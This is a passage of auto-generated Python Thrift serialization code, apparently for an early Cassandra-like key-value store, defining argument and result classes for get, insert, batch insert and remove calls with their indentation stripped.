oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_slice_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter45 in self.success:
iter45.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_column_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_column_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_column_result:
thrift_spec = (
(0, TType.STRUCT, 'success', (column_t, column_t.thrift_spec), None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = column_t()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_column_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_column_count_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_column_count_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_column_count_result:
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_column_count_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class insert_blocking_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
self.cellData = None
self.timestamp = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
if 'cellData' in d:
self.cellData = d['cellData']
if 'timestamp' in d:
self.timestamp = d['timestamp']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -4:
if ftype == TType.STRING:
self.cellData = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -5:
if ftype == TType.I32:
self.timestamp = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('insert_blocking_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
if self.cellData != None:
oprot.writeFieldBegin('cellData', TType.STRING, -4)
oprot.writeString(self.cellData)
oprot.writeFieldEnd()
if self.timestamp != None:
oprot.writeFieldBegin('timestamp', TType.I32, -5)
oprot.writeI32(self.timestamp)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class insert_blocking_result:
thrift_spec = (
)
def __init__(self, d=None):
pass
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('insert_blocking_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class insert_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
self.cellData = None
self.timestamp = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
if 'cellData' in d:
self.cellData = d['cellData']
if 'timestamp' in d:
self.timestamp = d['timestamp']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -4:
if ftype == TType.STRING:
self.cellData = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -5:
if ftype == TType.I32:
self.timestamp = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('insert_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
if self.cellData != None:
oprot.writeFieldBegin('cellData', TType.STRING, -4)
oprot.writeString(self.cellData)
oprot.writeFieldEnd()
if self.timestamp != None:
oprot.writeFieldBegin('timestamp', TType.I32, -5)
oprot.writeI32(self.timestamp)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class insert_result:
thrift_spec = (
)
def __init__(self, d=None):
pass
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('insert_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_args:
thrift_spec = None
def __init__(self, d=None):
self.batchMutation = None
if isinstance(d, dict):
if 'batchMutation' in d:
self.batchMutation = d['batchMutation']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRUCT:
self.batchMutation = batch_mutation_t()
self.batchMutation.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_args')
if self.batchMutation != None:
oprot.writeFieldBegin('batchMutation', TType.STRUCT, -1)
self.batchMutation.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_result:
thrift_spec = (
)
def __init__(self, d=None):
pass
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_blocking_args:
thrift_spec = None
def __init__(self, d=None):
self.batchMutation = None
if isinstance(d, dict):
if 'batchMutation' in d:
self.batchMutation = d['batchMutation']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRUCT:
self.batchMutation = batch_mutation_t()
self.batchMutation.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_blocking_args')
if self.batchMutation != None:
oprot.writeFieldBegin('batchMutation', TType.STRUCT, -1)
self.batchMutation.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_blocking_result:
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_blocking_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_result:
thrift_spec = (
)
def __init__(self, d=None):
pass
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_slice_super_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_superColumnName = None
self.start = -1
self.count = -1
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_superColumnName' in d:
self.columnFamily_superColumnName = d['columnFamily_superColumnName']
if 'start' in d:
self.start = d['start']
if 'count' in d:
self.count = d['count']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_superColumnName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -4:
if ftype == TType.I32:
self.start = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == -5:
if ftype == TType.I32:
self.count = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_slice_super_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_superColumnName != None:
oprot.writeFieldBegin('columnFamily_superColumnName', TType.STRING, -3)
oprot.writeString(self.columnFamily_superColumnName)
oprot.writeFieldEnd()
if self.start != None:
oprot.writeFieldBegin('start', TType.I32, -4)
oprot.writeI32(self.start)
oprot.writeFieldEnd()
if self.count != None:
oprot.writeFieldBegin('count', TType.I32, -5)
oprot.writeI32(self.count)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_slice_super_result:
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(superColumn_t, superColumn_t.thrift_spec)), None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype49, _size46) = iprot.readListBegin()
for _i50 in xrange(_size46):
_elem51 = superColumn_t()
_elem51.read(iprot)
self.success.append(_elem51)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_slice_super_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter52 in self.success:
iter52.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_superColumn_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily = None
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily' in d:
self.columnFamily = d['columnFamily']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_superColumn_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily != None:
oprot.writeFieldBegin('columnFamily', TType.STRING, -3)
oprot.writeString(self.columnFamily)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_superColumn_result:
thrift_spec = (
(0, TType.STRUCT, 'success', (superColumn_t, superColumn_t.thrift_spec), None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = superColumn_t()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
